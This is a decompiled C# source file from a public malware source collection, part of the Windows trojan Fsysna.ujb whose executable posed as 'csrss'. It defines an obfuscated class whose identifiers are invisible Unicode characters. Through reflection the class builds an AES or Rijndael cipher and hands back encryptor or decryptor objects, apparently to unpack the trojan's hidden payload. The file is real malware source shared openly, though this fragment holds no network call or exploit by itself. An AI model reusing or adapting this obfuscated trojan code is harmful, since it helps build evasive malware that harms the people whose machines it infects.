MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.ujb-dca840b3862ed520a86af06748a84aa60d663bef2c7875759235eb95d0228c91/_0003/_0001.cs
2022-08-18 06:28:56 -05:00

49 lines
1.6 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: csrss, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 57F4D4CE-643E-4C92-9C47-86B837B59593
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.ujb-dca840b3862ed520a86af06748a84aa60d663bef2c7875759235eb95d0228c91.exe
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace \u0003
{
internal sealed class \u0001
{
private readonly Type \u0001;
private readonly object \u0001;
public \u0001()
{
try
{
this.\u0001 = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e").GetType("System.Security.Cryptography.AesManaged");
}
catch (FileNotFoundException ex)
{
this.\u0001 = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.RijndaelManaged");
}
this.\u0001 = Activator.CreateInstance(this.\u0001);
}
public ICryptoTransform \u0002([In] byte[] obj0, [In] byte[] obj1, [In] bool obj2)
{
this.\u0001.GetProperty("Key").GetSetMethod().Invoke(this.\u0001, new object[1]
{
(object) obj0
});
this.\u0001.GetProperty("IV").GetSetMethod().Invoke(this.\u0001, new object[1]
{
(object) obj1
});
return (ICryptoTransform) this.\u0001.GetMethod(obj2 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.\u0001, new object[0]);
}
public void \u0002() => this.\u0001.GetMethod("Clear").Invoke(this.\u0001, new object[0]);
}
}